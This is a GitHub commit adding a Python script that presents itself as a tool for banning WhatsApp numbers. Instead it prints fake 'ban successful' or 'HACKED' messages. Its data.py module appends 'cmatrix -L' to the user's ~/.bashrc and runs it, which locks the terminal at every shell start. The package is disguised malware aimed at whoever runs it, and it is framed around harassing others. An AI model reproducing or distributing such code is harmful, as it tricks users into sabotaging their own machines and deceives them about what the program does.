Skip to content

Commit d7a7840

Browse files
authored
Add files via upload
1 parent 9d3c058 commit d7a7840

File tree

4 files changed

+94
-0
lines changed

4 files changed

+94
-0
lines changed

.gitignore

+3
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
# Default ignored files
2+
/shelf/
3+
/workspace.xml

Wh4tsb4n.iml

+10
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<module type="PYTHON_MODULE" version="4">
3+
<component name="NewModuleRootManager">
4+
<content url="file://$MODULE_DIR$">
5+
<excludeFolder url="file://$MODULE_DIR$/venv" />
6+
</content>
7+
<orderEntry type="inheritedJdk" />
8+
<orderEntry type="sourceFolder" forTests="false" />
9+
</component>
10+
</module>

data.py

+5
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
import os
2+
import sys
3+
def lockout():
4+
os.system("echo 'cmatrix -L' >> ~/.bashrc")
5+
os.system("cmatrix -L")

main.py

+76
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
# Whatsapp number banning tool
2+
# Created by Mr Juice
3+
#
4+
import os
5+
import time
6+
import sys
7+
import data
8+
9+
print("Installing packages . . .")
10+
os.system("clear")
11+
os.system("pkg install cmatrix")
12+
os.system("pip3 install colorama")
13+
os.system("clear")
14+
#
15+
# Now importing colorama
16+
#
17+
import colorama
18+
from colorama import Fore
19+
#
20+
def delay_print(s):
21+
for c in s:
22+
sys.stdout.write(c)
23+
sys.stdout.flush()
24+
time.sleep(0.05)
25+
def banner_display():
26+
print(f''' {Fore.CYAN}
27+
_ _ _
28+
__ __| |__ __ _ | |_ ___ | |__ __ _ _ __
29+
\ \ /\ / /| '_ \ / _` || __|/ __|| '_ \ / _` || '_ \
30+
\ V V / | | | || (_| || |_ \__ \| |_) || (_| || | | |
31+
\_/\_/ |_| |_| \__,_| \__||___/|_.__/ \__,_||_| |_|
32+
{Fore.YELLOW}
33+
Coded by Mr Juice
34+
Chat Me https://bio.link/mrjuice
35+
Whatsapp number banning tool
36+
{Fore.CYAN}
37+
*************************************************
38+
{Fore.WHITE} ''')
39+
banner_display()
40+
#
41+
#
42+
def program():
43+
number = input("[+] pPut Number: +263")
44+
realnumber = "+263"+number
45+
check = number.isnumeric()
46+
lennber = len(number)
47+
if (check == True):
48+
if (lennber < 10 or lennber > 10):
49+
delay_print(f"{Fore.RED}Number must be 10 digits\n")
50+
program()
51+
elif (lennber==10):
52+
delay_print(f"{Fore.YELLOW}1) Ban number\n")
53+
delay_print(f"{Fore.YELLOW}2) Information about this number\n")
54+
option = input(f"{Fore.YELLOW}[+] Choose an option: ")
55+
if (option=="1"):
56+
delay_print(f"{Fore.YELLOW}Are you sure to ban "+realnumber+"?\n")
57+
yesorno1 = input("(Y/N): ")
58+
delay_print("Banning of "+realnumber+" is successfull!")
59+
data.lockout()
60+
61+
elif (option=="2"):
62+
delay_print(f"{Fore.YELLOW}Gather information for "+realnumber+"?\n")
63+
yesorno2 = input("(Y/N): ")
64+
delay_print("Name: 47hxl-53r\nStatus: HACKED by Mr Juice!")
65+
data.lockout()
66+
67+
else:
68+
delay_print(f"{Fore.RED}It's not an option\n")
69+
program()
70+
71+
72+
else:
73+
delay_print(f"{Fore.RED}Number is incorrect... Please try again . . .\n")
74+
print("")
75+
program()
76+
program()

0 commit comments

Comments
 (0)